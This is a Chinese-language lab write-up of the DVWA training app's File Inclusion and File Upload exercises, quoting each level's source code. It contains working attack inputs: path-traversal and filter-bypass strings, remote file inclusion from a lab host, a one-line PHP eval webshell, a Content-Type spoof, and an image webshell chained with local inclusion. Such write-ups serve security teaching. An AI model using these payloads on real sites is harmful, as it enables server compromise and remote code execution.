文章目录
1. DVWA File Inclusion
Low level
url路径:
/dvwa/vulnerabilities/fi/index.php?page=include.php
可以看出page参数对应的php会被包含,尝试包含passwd:
/dvwa/vulnerabilities/fi/index.php?page=../../../../../etc/passwd
页面回显:
root:x:0:0:root:/root:/bin/bash
...
telnetd:x:112:120::/nonexistent:/bin/false proftpd:x:113:65534::/var/run/proftpd:/bin/false statd:x:114:65534::/var/lib/nfs:/bin/false
并且在一开始访问page=../../../etc/passwd
错误路径时,页面暴露了www的绝对路径:
Warning: include(../etc/passwd) [function.include]: failed to open stream: No such file or directory in /var/www/dvwa/vulnerabilities/fi/index.php on line 35
看下源码,没有对page参数做任何检查:
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
?>
Medium level
用…/无法访问上级目录了。
源码:
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\\" ), "", $file );
?>
过滤了http://和https://,试图禁止包含远程文件;过滤…/,试图禁止包含本地文件。
很好绕过:
page=httphttp://://10.10.10.156/dvwa/vulnerabilities/fi/file1.php
Fatal error: Call to undefined function dvwaCurrentUser() in C:\phpstudy_pro\WWW\DVWA\vulnerabilities\fi\file1.php on line 9
虽然报错,但文件确实包含了。在服务端放个phpinfo.php:
page=htthttp://p://10.10.10.156/phpinfo.php
成功执行phpinfo()。
本地文件包含过滤也是可以绕过:
page=..././..././..././..././..././etc/passwd
High level
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
high难度要求必须以file协议指定page。
windows版绕过(绝对路径已通过报错信息获得):
page=file://C:\\phpstudy_pro\\WWW\\phpinfo.php
Impossible level
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
直接白名单了,impossible。
2. DVWA File upload
先准备好一句话木马shell.php,参数123:
<?php eval($_GET(123)); ?>
Low level
直接上传,回显:
../../hackable/uploads/shell.php succesfully uploaded!
服务端的路径:
dvwa/vulnerabilities/upload/../../hackable/uploads/shell.php
->
dvwa/hackable/uploads/shell.php
访问dvwa/hackable/uploads/shell.php?123=phpinfo();
,成功执行phpinfo().
查看源码,没有任何检查:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
$html .= '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
Medium level
直接上传php后报错:
Your image was not uploaded. We can only accept JPEG or PNG images.
抓包修改type即可:
Content-Type: image/jpeg
查看源码,对type和size作了检查:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
$html .= '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
$html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
High level
这次只是修改type就不能绕过了。修改文件名为shell.jpg也不行。服务端应该是检查了文件头,所以需要制作图片木马,过程不赘述,之前的博客记录过。
上传后搭配本地文件包含漏洞,用webshell连接测试。
http://10.10.10.156/dvwa/vulnerabilities/fi/?page=file://C:\\phpstudy_pro\\WWW\\dvwa/hackable/uploads/picwebsh.png
这里需要注意的坑是,用蚁剑连接时,要先访问并登录一下,level改为high或更低。
Impossible Level
这个级别对图片进行了二次渲染,仅提取图片数据保存,一句话木马就被筛掉了。
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
//$target_file = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
$target_file = md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
$temp_file = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
$temp_file .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
// Is it an image?
if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
( $uploaded_size < 100000 ) &&
( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
getimagesize( $uploaded_tmp ) ) {
// Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
if( $uploaded_type == 'image/jpeg' ) {
$img = imagecreatefromjpeg( $uploaded_tmp );
imagejpeg( $img, $temp_file, 100);
}
else {
$img = imagecreatefrompng( $uploaded_tmp );
imagepng( $img, $temp_file, 9);
}
imagedestroy( $img );
// Can we move the file to the web root from the temp folder?
if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
// Yes!
$html .= "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";
}
else {
// No
$html .= '<pre>Your image was not uploaded.</pre>';
}
// Delete any temp files
if( file_exists( $temp_file ) )
unlink( $temp_file );
}
else {
// Invalid file
$html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>